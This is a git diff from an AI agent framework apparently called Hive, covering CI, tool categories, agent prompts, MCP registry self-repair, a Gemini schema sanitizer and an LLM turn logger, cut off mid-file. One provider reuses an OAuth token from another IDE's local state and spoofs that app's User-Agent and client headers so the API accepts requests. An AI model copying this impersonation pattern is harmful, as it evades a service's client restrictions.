chore: lint

feat: llm logging
feat: encourage action plan prompts
2026-05-04 17:57:56 -07:00 · 2026-05-04 17:57:20 -07:00 · 2026-05-04 17:55:44 -07:00 · 2026-05-04 12:36:28 -07:00 · 2026-05-04 12:35:21 -07:00 · 2026-05-04 12:35:21 -07:00
84 changed files with 3596 additions and 3017 deletions
@@ -47,7 +47,6 @@
      "Bash(grep -v ':0$')",
      "Bash(curl -s -m 2 http://127.0.0.1:4002/sse -o /dev/null -w 'status=%{http_code} time=%{time_total}s\\\\n')",
      "mcp__gcu-tools__browser_status",
-      "mcp__gcu-tools__browser_start",
      "mcp__gcu-tools__browser_navigate",
      "mcp__gcu-tools__browser_evaluate",
      "mcp__gcu-tools__browser_screenshot",
@@ -214,7 +214,7 @@ Curated list of known browser automation edge cases with symptoms, causes, and f
 | **Symptom** | `browser_open()` returns `"No group with id: XXXXXXX"` even though `browser_status` shows `running: true` |
 | **Root Cause** | In-memory `_contexts` dict has a stale `groupId` from a Chrome tab group that was closed outside the tool (e.g. user closed the tab group) |
 | **Detection** | `browser_status` returns `running: true` but `browser_open` fails with "No group with id" |
-| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_start()` again |
+| **Fix** | Call `browser_stop()` to clear stale context from `_contexts`, then `browser_open(url)` to lazy-create a fresh one |
 | **Code** | `tools/lifecycle.py:144-160` - `already_running` check uses cached dict without validating against Chrome |
 | **Verified** | 2026-04-03 ✓ |

@@ -84,11 +84,23 @@ jobs:
        with:
          enable-cache: true

-      - name: Install dependencies and run tests
+      - name: Install dependencies
        working-directory: tools
-        run: |
-          uv sync --extra dev
-          uv run pytest tests/ -v
+        run: uv sync --extra dev
+
+      - name: Install Playwright Chromium (Linux)
+        if: runner.os == 'Linux'
+        working-directory: tools
+        run: uv run playwright install --with-deps chromium
+
+      - name: Install Playwright Chromium (Windows)
+        if: runner.os == 'Windows'
+        working-directory: tools
+        run: uv run playwright install chromium
+
+      - name: Run tests
+        working-directory: tools
+        run: uv run pytest tests/ -v

  validate:
    name: Validate Agent Exports
@@ -407,7 +407,7 @@ Aden Hive supports **100+ LLM providers** via LiteLLM, giving users maximum flex
 | **Anthropic** | Claude 3.5 Sonnet, Haiku, Opus | Default provider, best for reasoning |
 | **OpenAI** | GPT-4, GPT-4 Turbo, GPT-4o | Function calling, vision |
 | **OpenRouter** | Any OpenRouter catalog model | Uses `OPENROUTER_API_KEY` and `https://openrouter.ai/api/v1` |
-| **Hive LLM** | `queen`, `kimi-2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
+| **Hive LLM** | `queen`, `kimi-k2.5`, `GLM-5` | Uses `HIVE_API_KEY` and the Hive-managed endpoint |
 | **Google** | Gemini 1.5 Pro, Flash | Long context windows |
 | **DeepSeek** | DeepSeek V3 | Cost-effective, strong reasoning |
 | **Mistral** | Mistral Large, Medium, Small | Open weights, EU hosting |
@@ -435,7 +435,7 @@ DEFAULT_MODEL = "claude-haiku-4-5-20251001"

 **Provider-Specific Notes**
 - **OpenRouter**: store `provider` as `openrouter`, use the raw OpenRouter model ID in `model` (for example `x-ai/grok-4.20-beta`), and use `OPENROUTER_API_KEY`
- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-2.5`, or `GLM-5`, and use `HIVE_API_KEY`
+- **Hive LLM**: store `provider` as `hive`, use Hive model names such as `queen`, `kimi-k2.5`, or `GLM-5`, and use `HIVE_API_KEY`

 **For Development**
 - Use cheaper/faster models (Haiku, GPT-4o-mini)
@@ -72,17 +72,16 @@ Register an MCP server as a tool source for your agent.
    "cwd": "../tools",
    "description": "Aden tools..."
  },
-  "tools_discovered": 6,
+  "tools_discovered": 5,
  "tools": [
    "web_search",
    "web_scrape",
    "file_read",
    "file_write",
-    "pdf_read",
-    "example_tool"
+    "pdf_read"
  ],
  "total_mcp_servers": 1,
-  "note": "MCP server 'tools' registered with 6 tools. These tools can now be used in event_loop nodes."
+  "note": "MCP server 'tools' registered with 5 tools. These tools can now be used in event_loop nodes."
 }
 ```

@@ -240,19 +240,15 @@ See "Independent execution" for the per-step flow and granularity rule.

 ## File I/O (files-tools MCP)
 - read_file, write_file, edit_file, search_files
-  - edit_file covers single-file fuzzy find/replace (mode='replace', default) \
+- edit_file covers single-file fuzzy find/replace (mode='replace', default) \
 and multi-file structured patches (mode='patch'). Patch mode supports \
 Update / Add / Delete / Move atomically across many files in one call.
-  - search_files covers grep/find/ls in one tool: target='content' to \
+- search_files covers grep/find/ls in one tool: target='content' to \
 search inside files, target='files' (with a glob like '*.py') to list \
-or find files. Mtime-sorted in files mode.
+or find files.

 ## Browser Automation (gcu-tools MCP)
- Use `browser_*` tools — `browser_open(url)` is the cold-start entry point \
-  (lazy-creates the context; no `browser_start` first). Then `browser_navigate`, \
-  `browser_click`, `browser_type`, `browser_snapshot`, \
-  <!-- vision-only -->`browser_screenshot`, <!-- /vision-only -->`browser_scroll`, \
-  `browser_tabs`, `browser_close`, `browser_evaluate`, etc.
+- Use `browser_*` tools — `browser_open(url)` is the cold-start entry point
 - MUST Follow the browser-automation skill protocol before using browser tools.

 ## Hand off to a colony
@@ -261,9 +257,7 @@ or find files. Mtime-sorted in files mode.
  chat. It does NOT fork on its own; it spawns a one-shot evaluator \
  that reads this conversation and decides whether the spec is settled \
  enough to proceed. On approval your phase flips to INCUBATING and a \
-  new tool surface (including create_colony itself) unlocks. On \
-  rejection you stay here and keep the conversation going to fill the \
-  gaps the evaluator named.
+  new tool surface (including create_colony itself) unlocks.
 """

 _queen_tools_incubating = """
@@ -411,17 +405,19 @@ asks for specifics. Do not invent a new pass unless the user asks for one.
 _queen_behavior_independent = """
 ## Independent execution

-You are the agent. **For multi-step work (2+ atomic actions): call \
-`task_create_batch`** with one entry per atomic action, \
-before you touch any other tool. \
-Then work the list one task at a time:
+You are the agent. you behave this way:
+1. Identify if the user's prompt is a task assignment. If it is, \
+Use ask_user to clarify the scope and detail requirements, then always use \
+the `task_create_batch` to create a multi-step action plan.

-1. `task_update` → in_progress before you start the step.
-2. Do one real inline instance — open the browser, call the real API, \
+2. `task_update` → in_progress before you start the step.
+
+3. Do one real inline instance - either open the browser, call the real API, \
 write to the real file. If the action is irreversible or touches \
 shared systems, show and confirm before executing. Report concrete \
 evidence (actual output, what worked / failed) after the run.
-3. `task_update` → completed THE MOMENT it's done. **Do not let \
+
+4. `task_update` → completed THE MOMENT it's done. **Do not let \
 multiple finished tasks pile up unmarked.** There is no batch update \
 tool by design — each `completed` transition is a discrete progress \
 heartbeat in the user's right-rail panel. Without those transitions \
@@ -430,14 +426,14 @@ done.

 **Granularity: one task per atomic action, not one umbrella per project.** \

-Once finishing all current tasks, discuss with user about building \
-a colony so this sucess can be repeated or scaled
+Once finishing a current task, discuss with user about building \
+a colony so this success outcome can be repeated or scaled

 ### How to handle large scale tasks
-If the user ask you to finish the same task repeatly or at large scale \
-(more than 10 times), tell the user that you can do it once first then \
+If the user ask you to finish the same task repeatedly or at large scale \
+(more than 3 times), tell the user that you can do it once first then \
 build a colony to fulfill the request but succeeding it once will be \
-beneficial to run it in the future, \
+beneficial to run transfer it to a swarm of workers(through start_incubating_colony), \
 then focus on finishing the task once first.

 ### How to handle simple task (less then 2 atomic items)
@@ -88,7 +88,6 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
    "browser_basic": [
        "browser_setup",
        "browser_status",
-        "browser_start",
        "browser_stop",
        "browser_tabs",
        "browser_open",
@@ -130,10 +129,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
    # Research — paper search, Wikipedia, ad-hoc web scrape. Pair with
    # browser_basic for richer site-by-site research; this category is the
    # lightweight always-available fallback.
-    "research": [
-        "web_scrape",
-        "pdf_read"
-    ],
+    "research": ["web_scrape", "pdf_read"],
    # Security — defensive scanning and reconnaissance. Engineering-only
    # surface; the rest of the queens shouldn't see port scanners.
    "security": [
@@ -146,7 +142,7 @@ _TOOL_CATEGORIES: dict[str, list[str]] = {
        "risk_score",
    ],
    # Lightweight context helpers — good default for every queen.
-    "time_context": [
+    "context_awareness": [
        "get_current_time",
        "get_account_info",
    ],
@@ -182,7 +178,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
        "browser_basic",
        "browser_interaction",
        "research",
-        "time_context",
+        "context_awareness",
        "charts",
    ],
    # Head of Growth — data, experiments, competitor research; no security.
@@ -192,7 +188,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
        "browser_basic",
        "browser_interaction",
        "research",
-        "time_context",
+        "context_awareness",
        "charts",
    ],
    # Head of Product Strategy — user research + roadmaps; no security.
@@ -202,7 +198,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
        "browser_basic",
        "browser_interaction",
        "research",
-        "time_context",
+        "context_awareness",
        "charts",
    ],
    # Head of Finance — financial models (CSV/Excel heavy), market research.
@@ -213,7 +209,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
        "browser_basic",
        "browser_interaction",
        "research",
-        "time_context",
+        "context_awareness",
        "charts",
    ],
    # Head of Legal — reads contracts/PDFs, researches; no data/security.
@@ -223,7 +219,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
        "browser_basic",
        "browser_interaction",
        "research",
-        "time_context",
+        "context_awareness",
    ],
    # Head of Brand & Design — visual refs, style guides; no data/security.
    "queen_brand_design": [
@@ -232,17 +228,16 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
        "browser_basic",
        "browser_interaction",
        "research",
-        "time_context",
+        "context_awareness",
    ],
    # Head of Talent — candidate pipelines, resumes; data + browser heavy.
    "queen_talent": [
        "file_ops",
        "terminal_basic",
-        "spreadsheet_advanced",
        "browser_basic",
        "browser_interaction",
        "research",
-        "time_context",
+        "context_awareness",
    ],
    # Head of Operations — processes, automation, observability.
    "queen_operations": [
@@ -251,7 +246,7 @@ QUEEN_DEFAULT_CATEGORIES: dict[str, list[str]] = {
        "spreadsheet_advanced",
        "browser_basic",
        "browser_interaction",
-        "time_context",
+        "context_awareness",
        "charts",
    ],
 }
@@ -17,7 +17,7 @@ Use browser nodes (with `tools: {policy: "all"}`) when:
 ## Available Browser Tools

 All tools are prefixed with `browser_`:
- `browser_open`, `browser_navigate` — preferred entry points; both lazy-create a browser context, so a single `browser_open(url)` covers the cold path. Use `browser_start` only to warm a profile without a URL or to recreate a context after `browser_stop`.
+- `browser_open`, `browser_navigate` — both lazy-create the browser context, so a single `browser_open(url)` covers the cold path. To recover from a stale context, call `browser_stop` then `browser_open(url)` again.
 - `browser_click`, `browser_click_coordinate`, `browser_type`, `browser_type_focused` — interact
 - `browser_press` (with optional `modifiers=["ctrl"]` etc.) — keyboard shortcuts
 - `browser_snapshot` — compact accessibility-tree read (structured)
@@ -7,7 +7,7 @@ verify SOP gates before marking a task done. This gives cross-run memory
 that the existing per-iteration stall detectors don't have.

 The DB is driven by agents via the ``sqlite3`` CLI through
-``execute_command_tool``. This module handles framework-side lifecycle:
+``terminal_exec``. This module handles framework-side lifecycle:
 creation, migration, queen-side bulk seeding, stale-claim reclamation.

 Concurrency model:
@@ -61,10 +61,12 @@ _IDE_STATE_DB_KEY = "antigravityUnifiedStateSync.oauthToken"

 _BASE_HEADERS: dict[str, str] = {
    # Mimic the Antigravity Electron app so the API accepts the request.
+    # Google deprecates older client versions over time, so this needs periodic
+    # bumping to match whatever the current Antigravity desktop release advertises.
    "User-Agent": (
        "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 "
-        "(KHTML, like Gecko) Antigravity/1.18.3 Chrome/138.0.7204.235 "
-        "Electron/37.3.1 Safari/537.36"
+        "(KHTML, like Gecko) Antigravity/1.23.2 Chrome/138.0.7204.235 "
+        "Electron/39.2.3 Safari/537.36"
    ),
    "X-Goog-Api-Client": "google-cloud-sdk vscode_cloudshelleditor/0.1",
    "Client-Metadata": '{"ideType":"ANTIGRAVITY","platform":"MACOS","pluginType":"GEMINI"}',
@@ -254,6 +256,56 @@ def _clean_tool_name(name: str) -> str:
    return name[:64]


+def _sanitize_schema_for_gemini(schema: Any) -> Any:
+    """Convert JSON Schema 2020-12 features to the OpenAPI 3.0 dialect Gemini accepts.
+
+    Gemini's function_declarations parser rejects union ``"type": ["string", "null"]``.
+    Translate any such union to a single type plus ``"nullable": true``. Recurse into
+    ``properties``, ``items``, and the ``anyOf``/``oneOf``/``allOf`` combinators.
+    """
+    if isinstance(schema, list):
+        return [_sanitize_schema_for_gemini(s) for s in schema]
+    if not isinstance(schema, dict):
+        return schema
+
+    out = dict(schema)
+    t = out.get("type")
+    if isinstance(t, list):
+        non_null = [x for x in t if x != "null"]
+        has_null = "null" in t
+        if len(non_null) == 1:
+            out["type"] = non_null[0]
+            if has_null:
+                out["nullable"] = True
+        elif not non_null and has_null:
+            # Pure null type: fall back to string-nullable.
+            out["type"] = "string"
+            out["nullable"] = True
+        else:
+            # Multi-type non-null unions (e.g. ["string", "integer", "null"])
+            # have no faithful Gemini equivalent. Silently picking one type
+            # changes the contract for callers who rely on the others, so
+            # fail loud and let the schema author rewrite it as anyOf or
+            # narrow to a single type.
+            raise ValueError(
+                f"Unsupported Gemini schema union: {t!r}. "
+                "Gemini accepts a single primitive type plus optional 'nullable: true'. "
+                "Rewrite as anyOf or pick a single type."
+            )
+
+    if "properties" in out and isinstance(out["properties"], dict):
+        out["properties"] = {k: _sanitize_schema_for_gemini(v) for k, v in out["properties"].items()}
+    if "items" in out:
+        out["items"] = _sanitize_schema_for_gemini(out["items"])
+    if "additionalProperties" in out and isinstance(out["additionalProperties"], dict):
+        out["additionalProperties"] = _sanitize_schema_for_gemini(out["additionalProperties"])
+    for combinator in ("anyOf", "oneOf", "allOf"):
+        if combinator in out:
+            out[combinator] = _sanitize_schema_for_gemini(out[combinator])
+
+    return out
+
+
 def _to_gemini_contents(
    messages: list[dict[str, Any]],
    thought_sigs: dict[str, str] | None = None,
@@ -555,11 +607,13 @@ class AntigravityProvider(LLMProvider):
                        {
                            "name": _clean_tool_name(t.name),
                            "description": t.description,
-                            "parameters": t.parameters
-                            or {
-                                "type": "object",
-                                "properties": {},
-                            },
+                            "parameters": _sanitize_schema_for_gemini(
+                                t.parameters
+                                or {
+                                    "type": "object",
+                                    "properties": {},
+                                }
+                            ),
                        }
                        for t in tools
                    ]
@@ -2346,10 +2346,6 @@ class LiteLLMProvider(LLMProvider):
            kwargs["extra_body"]["store"] = False

        request_summary = _summarize_request_for_log(kwargs)
-        logger.debug(
-            "[stream] prepared request: %s",
-            json.dumps(request_summary, default=str),
-        )
        if request_summary["system_only"]:
            logger.warning(
                "[stream] %s request has no non-system chat messages "
@@ -326,7 +326,7 @@
          "supports_vision": false
        },
        {
-          "id": "kimi-2.5",
+          "id": "kimi-k2.5",
          "label": "Kimi 2.5 - Via Hive",
          "recommended": false,
          "max_tokens": 32768,
@@ -489,8 +489,8 @@
          "recommended": true
        },
        {
-          "id": "kimi-2.5",
-          "label": "kimi-2.5",
+          "id": "kimi-k2.5",
+          "label": "kimi-k2.5",
          "recommended": false
        },
        {
@@ -52,11 +52,11 @@ _DEFAULT_LOCAL_SERVERS: dict[str, dict[str, Any]] = {
        "args": ["run", "python", "files_server.py", "--stdio"],
    },
    "terminal-tools": {
-        "description": "Terminal capabilities: process exec, background jobs, PTY sessions, fs search. Bash-only on POSIX.",
+        "description": "Terminal capabilities",
        "args": ["run", "python", "terminal_tools_server.py", "--stdio"],
    },
    "chart-tools": {
-        "description": "BI/financial chart + diagram rendering: ECharts, Mermaid. Returns spec + downloadable PNG; chat embeds live.",
+        "description": "BI/financial chart + diagram rendering: ECharts, Mermaid",
        "args": ["run", "python", "chart_tools_server.py", "--stdio"],
    },
 }
@@ -137,6 +137,13 @@ class MCPRegistry:
        Skips entirely when the source-tree ``tools/`` directory cannot
        be located (e.g. wheel installs). Returns the list of names that
        were newly registered.
+
+        Also runs a self-heal pass over already-registered defaults: if an
+        entry's stdio cwd is unreachable on this machine (e.g. the registry
+        was copied from another developer's box and points at their
+        ``/Users/<them>/...`` path), the entry is overwritten with the
+        canonical config so the queen can actually spawn it. The user's
+        ``enabled`` toggle and ``overrides`` are preserved.
        """
        # parents: [0]=loader, [1]=framework, [2]=core, [3]=repo root
        tools_dir = Path(__file__).resolve().parents[3] / "tools"
@@ -165,8 +172,31 @@ class MCPRegistry:
                )
                del existing[stale]
                mutated = True
+
+        repaired: list[str] = []
+        for name, spec in _DEFAULT_LOCAL_SERVERS.items():
+            entry = existing.get(name)
+            if entry is None:
+                continue
+            if self._default_entry_runnable(entry, tools_dir, list(spec["args"])):
+                continue
+            existing[name] = self._build_default_entry(
+                name=name,
+                spec=spec,
+                cwd=cwd,
+                preserve_from=entry,
+            )
+            repaired.append(name)
+            mutated = True
+
        if mutated:
            self._write_installed(data)
+        if repaired:
+            logger.warning(
+                "MCPRegistry._seed_defaults: repaired %d default server(s) with unreachable cwd/script: %s",
+                len(repaired),
+                repaired,
+            )

        for name, spec in _DEFAULT_LOCAL_SERVERS.items():
            if name in existing:
@@ -188,6 +218,91 @@ class MCPRegistry:
            logger.info("MCPRegistry: seeded default local servers: %s", added)
        return added

+    @staticmethod
+    def _default_entry_runnable(entry: dict, tools_dir: Path, canonical_args: list[str]) -> bool:
+        """Return True iff ``entry`` can plausibly be spawned on this machine.
+
+        Checks:
+        - transport is stdio (only stdio defaults exist today; non-stdio
+          gets a free pass since we have nothing to compare against)
+        - stdio.cwd is an existing directory
+        - the entry script (the first ``.py`` arg, e.g. ``files_server.py``)
+          exists relative to that cwd
+
+        We deliberately do NOT spawn the subprocess here — this runs on
+        every read path and must be cheap. A filesystem reachability
+        check catches the cross-machine `cwd` drift that is the common
+        failure, without flapping on transient runtime errors.
+        """
+        transport = entry.get("transport") or "stdio"
+        if transport != "stdio":
+            return True
+        manifest = entry.get("manifest") or {}
+        stdio = manifest.get("stdio") or {}
+        cwd_str = stdio.get("cwd")
+        if not cwd_str:
+            return False
+        cwd_path = Path(cwd_str)
+        if not cwd_path.is_dir():
+            return False
+        # Find the script: the first arg ending in .py, falling back to the
+        # canonical spec if the registered args are unrecognizable. Modules
+        # invoked via `python -m foo.bar` (no .py arg) are accepted as long
+        # as the cwd exists — we can't cheaply prove the module imports.
+        registered_args = stdio.get("args") or []
+        script: str | None = next(
+            (a for a in registered_args if isinstance(a, str) and a.endswith(".py")),
+            None,
+        )
+        if script is None:
+            script = next(
+                (a for a in canonical_args if isinstance(a, str) and a.endswith(".py")),
+                None,
+            )
+        if script is None:
+            return True
+        return (cwd_path / script).is_file()
+
+    @classmethod
+    def _build_default_entry(
+        cls,
+        *,
+        name: str,
+        spec: dict[str, Any],
+        cwd: str,
+        preserve_from: dict | None,
+    ) -> dict:
+        """Construct a fresh canonical entry for a default server.
+
+        When ``preserve_from`` is provided, carries over the user's
+        ``enabled`` flag and ``overrides`` so a deliberate disable or
+        custom env var survives the repair.
+        """
+        manifest = {
+            "name": name,
+            "description": spec["description"],
+            "transport": {"supported": ["stdio"], "default": "stdio"},
+            "stdio": {
+                "command": "uv",
+                "args": list(spec["args"]),
+                "env": {},
+                "cwd": cwd,
+            },
+        }
+        entry = cls._make_entry(
+            source="local",
+            manifest=manifest,
+            transport="stdio",
+            installed_by="hive mcp init (auto-repair)",
+        )
+        if preserve_from is not None:
+            if "enabled" in preserve_from:
+                entry["enabled"] = bool(preserve_from["enabled"])
+            prior_overrides = preserve_from.get("overrides")
+            if isinstance(prior_overrides, dict):
+                entry["overrides"] = prior_overrides
+        return entry
+
    # ── Internal I/O ────────────────────────────────────────────────

    def _read_installed(self) -> dict:
@@ -158,7 +158,7 @@ cookie consent banners if they block content.
 - If `browser_snapshot` fails, try `browser_get_text` with a narrow
  selector as fallback.
 - If `browser_open` fails or the page seems stale, `browser_stop` →
-  `browser_start` → retry.
+  `browser_open(url)` to lazy-create a fresh context.

 ## `browser_evaluate`

@@ -683,11 +683,10 @@ class Orchestrator:
        # Set per-execution data_dir and agent_id so data tools and
        # spillover files share the same session-scoped directory, and
        # so MCP tools whose server-side schemas mark agent_id as a
-        # required field (execute_command_tool's bash_*, etc.) get a valid
-        # value injected even on
-        # registry instances where agent_loader.setup() didn't populate
-        # the session_context. Without this, FastMCP rejects those
-        # calls with "agent_id is a required property".
+        # required field get a valid value injected even on registry
+        # instances where agent_loader.setup() didn't populate the
+        # session_context. Without this, FastMCP rejects those calls
+        # with "agent_id is a required property".
        _ctx_token = None
        if self._storage_path:
            from framework.loader.tool_registry import ToolRegistry
@@ -377,6 +377,7 @@ async def create_queen(
        _queen_tools_working,
        finalize_queen_prompt,
    )
+    from framework.config import get_max_tokens as _get_max_tokens
    from framework.host.event_bus import AgentEvent, EventType
    from framework.llm.capabilities import supports_image_tool_results
    from framework.loader.mcp_registry import MCPRegistry
@@ -982,7 +983,12 @@ async def create_queen(
                llm=session.llm,
                available_tools=queen_tools,
                goal_context=queen_goal.to_prompt_context(),
-                max_tokens=lc.get("max_tokens", 8192),
+                # Honor configuration.json (llm.max_tokens) instead of
+                # hard-defaulting to 8192. The legacy fallback ignored both
+                # the user's saved ceiling AND the model's actual output
+                # capacity (e.g. glm-5.1 / kimi-k2.5 both support 32k out),
+                # which silently truncated long tool-emitting turns.
+                max_tokens=lc.get("max_tokens", _get_max_tokens()),
                stream_id="queen",
                execution_id=session.id,
                dynamic_tools_provider=phase_state.get_current_tools,
@@ -235,10 +235,6 @@ _SYSTEM_TOOLS: frozenset[str] = frozenset(
    {
        "get_account_info",
        "get_current_time",
-        "bash_kill",
-        "bash_output",
-        "execute_command_tool",
-        "example_tool",
    }
 )

@@ -19,7 +19,7 @@ from datetime import datetime
 from pathlib import Path
 from typing import Any, Literal

-from framework.config import QUEENS_DIR
+from framework.config import QUEENS_DIR, get_max_tokens
 from framework.host.triggers import TriggerDefinition

 logger = logging.getLogger(__name__)
@@ -700,7 +700,10 @@ class SessionManager:
            available_tools=all_tools,
            goal_context=goal.to_prompt_context(),
            goal=goal,
-            max_tokens=8192,
+            # Worker output cap — pull from configuration.json instead of
+            # hard-coding 8192. glm-5.1/kimi-k2.5 both support 32k out, and
+            # capping at 8k silently truncates long worker turns mid-tool.
+            max_tokens=get_max_tokens(),
            stream_id=worker_name,
            execution_id=worker_name,
            identity_prompt=worker_data.get("identity_prompt", ""),
@@ -11,7 +11,7 @@ metadata:

 **Applies when** your spawn message has `db_path:` and `colony_id:` fields. The DB is your durable working memory — tells you what's done, what to skip, which SOP gates you owe.

-Access via `execute_command_tool` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).
+Access via `terminal_exec` running `sqlite3 "<db_path>" "..."`. Tables: `tasks` (queue), `steps` (per-task decomposition), `sop_checklist` (hard gates).

 ### Claim: assigned task (check this FIRST)

@@ -410,7 +410,7 @@ In all of these cases the script is SHORT (< 10 lines) and the result is CONSUME
 - If a tool fails, retry once with the same approach.
 - If it fails a second time, STOP retrying and switch approach.
 - If `browser_snapshot` fails, try `browser_get_text` with a specific small selector as fallback.
- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_start`, then retry.
+- If `browser_open` fails or page seems stale, `browser_stop`, then `browser_open(url)` again to recreate a fresh context.

 ## Verified workflows

@@ -1,11 +1,22 @@
 """Write every LLM turn to ~/.hive/llm_logs/<ts>.jsonl for replay/debugging.

-Each line is a JSON object with the full LLM turn: the request payload
-(system prompt + messages), assistant text, tool calls, tool results, and
-token counts. The file is opened lazily on first call and flushed after every
-write. Errors are silently swallowed — this must never break the agent.
+Two record kinds, distinguished by ``_kind``:
+
+* ``session_header`` — emitted on the first turn of an ``execution_id`` and
+  any time its ``system_prompt`` or ``tools`` change. Carries those large
+  fields once instead of per-turn.
+* ``turn`` — one per LLM call. Carries per-turn outputs plus a
+  content-addressed message delta: ``message_hashes`` is the full ordered
+  message sequence for this turn, ``new_messages`` is hash → body for
+  messages we haven't emitted before for this ``execution_id``. The reader
+  reassembles full ``messages`` by accumulating ``new_messages`` across
+  prior turn records. Content-addressed (not positional) because the agent
+  prunes messages mid-session — a tail-delta would be wrong.
+
+Errors are silently swallowed — this must never break the agent.
 """

+import hashlib
 import json
 import logging
 import os
@@ -28,6 +39,12 @@ def _llm_debug_dir() -> Path:
 _log_file: IO[str] | None = None
 _log_ready = False  # lazy init guard

+# Per-execution_id delta state. Reset implicitly on process restart — a fresh
+# log file has no prior context, so re-emitting the header on first turn is
+# correct.
+_session_header_hash: dict[str, str] = {}
+_session_seen_msgs: dict[str, set[str]] = {}
+

 def _open_log() -> IO[str] | None:
    """Open the JSONL log file for this process."""
@@ -61,6 +78,17 @@ def _serialize_tools(tools: Any) -> list[dict[str, Any]]:
    return out


+def _content_hash(payload: Any) -> str:
+    raw = json.dumps(payload, default=str, sort_keys=True, ensure_ascii=False)
+    return hashlib.sha256(raw.encode("utf-8")).hexdigest()[:16]
+
+
+def _write_line(record: dict[str, Any]) -> None:
+    assert _log_file is not None
+    _log_file.write(json.dumps(record, default=str) + "\n")
+    _log_file.flush()
+
+
 def log_llm_turn(
    *,
    node_id: str,
@@ -75,7 +103,7 @@ def log_llm_turn(
    token_counts: dict[str, Any],
    tools: list[Any] | None = None,
 ) -> None:
-    """Write one JSONL line capturing a complete LLM turn.
+    """Write JSONL records capturing one LLM turn (header + turn delta).

    Never raises.
    """
@@ -89,23 +117,57 @@ def log_llm_turn(
            _log_ready = True
        if _log_file is None:
            return
-        record = {
-            # UTC + offset matches tool_call start_timestamp (agent_loop.py)
-            # so the viewer can render every event in one consistent local zone.
-            "timestamp": datetime.now(UTC).isoformat(),
-            "node_id": node_id,
-            "stream_id": stream_id,
-            "execution_id": execution_id,
-            "iteration": iteration,
-            "system_prompt": system_prompt,
-            "tools": _serialize_tools(tools),
-            "messages": messages,
-            "assistant_text": assistant_text,
-            "tool_calls": tool_calls,
-            "tool_results": tool_results,
-            "token_counts": token_counts,
-        }
-        _log_file.write(json.dumps(record, default=str) + "\n")
-        _log_file.flush()
+
+        # UTC + offset matches tool_call start_timestamp (agent_loop.py)
+        # so the viewer can render every event in one consistent local zone.
+        timestamp = datetime.now(UTC).isoformat()
+        serialized_tools = _serialize_tools(tools)
+
+        # Re-emit the header on first turn or whenever system/tools change.
+        # The Queen reflects different prompts across turns, so we can't
+        # assume strict immutability per execution_id.
+        header_hash = _content_hash({"system_prompt": system_prompt, "tools": serialized_tools})
+        if _session_header_hash.get(execution_id) != header_hash:
+            _write_line(
+                {
+                    "_kind": "session_header",
+                    "timestamp": timestamp,
+                    "execution_id": execution_id,
+                    "node_id": node_id,
+                    "stream_id": stream_id,
+                    "header_hash": header_hash,
+                    "system_prompt": system_prompt,
+                    "tools": serialized_tools,
+                }
+            )
+            _session_header_hash[execution_id] = header_hash
+
+        seen = _session_seen_msgs.setdefault(execution_id, set())
+        message_hashes: list[str] = []
+        new_messages: dict[str, dict[str, Any]] = {}
+        for msg in messages or []:
+            h = _content_hash(msg)
+            message_hashes.append(h)
+            if h not in seen:
+                seen.add(h)
+                new_messages[h] = msg
+
+        _write_line(
+            {
+                "_kind": "turn",
+                "timestamp": timestamp,
+                "execution_id": execution_id,
+                "node_id": node_id,
+                "stream_id": stream_id,
+                "iteration": iteration,
+                "header_hash": header_hash,
+                "message_hashes": message_hashes,
+                "new_messages": new_messages,
+                "assistant_text": assistant_text,
+                "tool_calls": tool_calls,
+                "tool_results": tool_results,
+                "token_counts": token_counts,
+            }
+        )
    except Exception:
        pass  # never break the agent
@@ -11,7 +11,9 @@
  },
  "dependencies": {
    "clsx": "^2.1.1",
+    "echarts": "^5.6.0",
    "lucide-react": "^0.575.0",
+    "mermaid": "^11.14.0",
    "react": "^18.3.1",
    "react-dom": "^18.3.1",
    "react-markdown": "^10.1.0",
@@ -13,6 +13,9 @@ import {
 } from "lucide-react";
 import WorkerRunBubble from "@/components/WorkerRunBubble";
 import type { WorkerRunGroup } from "@/components/WorkerRunBubble";
+import ChartToolDetail, {
+  type ChartToolEntry,
+} from "@/components/charts/ChartToolDetail";

 export interface ImageContent {
  type: "image_url";
@@ -205,7 +208,7 @@ export function toolHex(name: string): string {
 }

 export function ToolActivityRow({ content }: { content: string }) {
-  let tools: { name: string; done: boolean }[] = [];
+  let tools: ChartToolEntry[] = [];
  try {
    const parsed = JSON.parse(content);
    tools = parsed.tools || [];
@@ -239,52 +242,65 @@ export function ToolActivityRow({ content }: { content: string }) {
    if (counts.done > 0) donePills.push({ name, count: counts.done });
  }

+  // Per-call chart embeds: chart_render's result envelope carries the
+  // spec back, so the chat renders the same chart the server
+  // rasterized to PNG. Other tools stay pill-only by design.
+  const chartDetails = tools.filter((t) => t.name.startsWith("chart_"));
+
  return (
-    <div className="flex gap-3 pl-10">
-      <div className="flex flex-wrap items-center gap-1.5">
-        {runningPills.map((p) => {
-          const hex = toolHex(p.name);
-          return (
-            <span
-              key={`run-${p.name}`}
-              className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
-              style={{
-                color: hex,
-                backgroundColor: `${hex}18`,
-                border: `1px solid ${hex}35`,
-              }}
-            >
-              <Loader2 className="w-2.5 h-2.5 animate-spin" />
-              {p.name}
-              {p.count > 1 && (
-                <span className="text-[10px] font-medium opacity-70">
-                  ×{p.count}
-                </span>
-              )}
-            </span>
-          );
-        })}
-        {donePills.map((p) => {
-          const hex = toolHex(p.name);
-          return (
-            <span
-              key={`done-${p.name}`}
-              className="inline-flex items-center gap-1 text-[11px] px-2.5 py-0.5 rounded-full"
-              style={{
-                color: hex,
-                backgroundColor: `${hex}18`,
-                border: `1px solid ${hex}35`,
-              }}
-            >
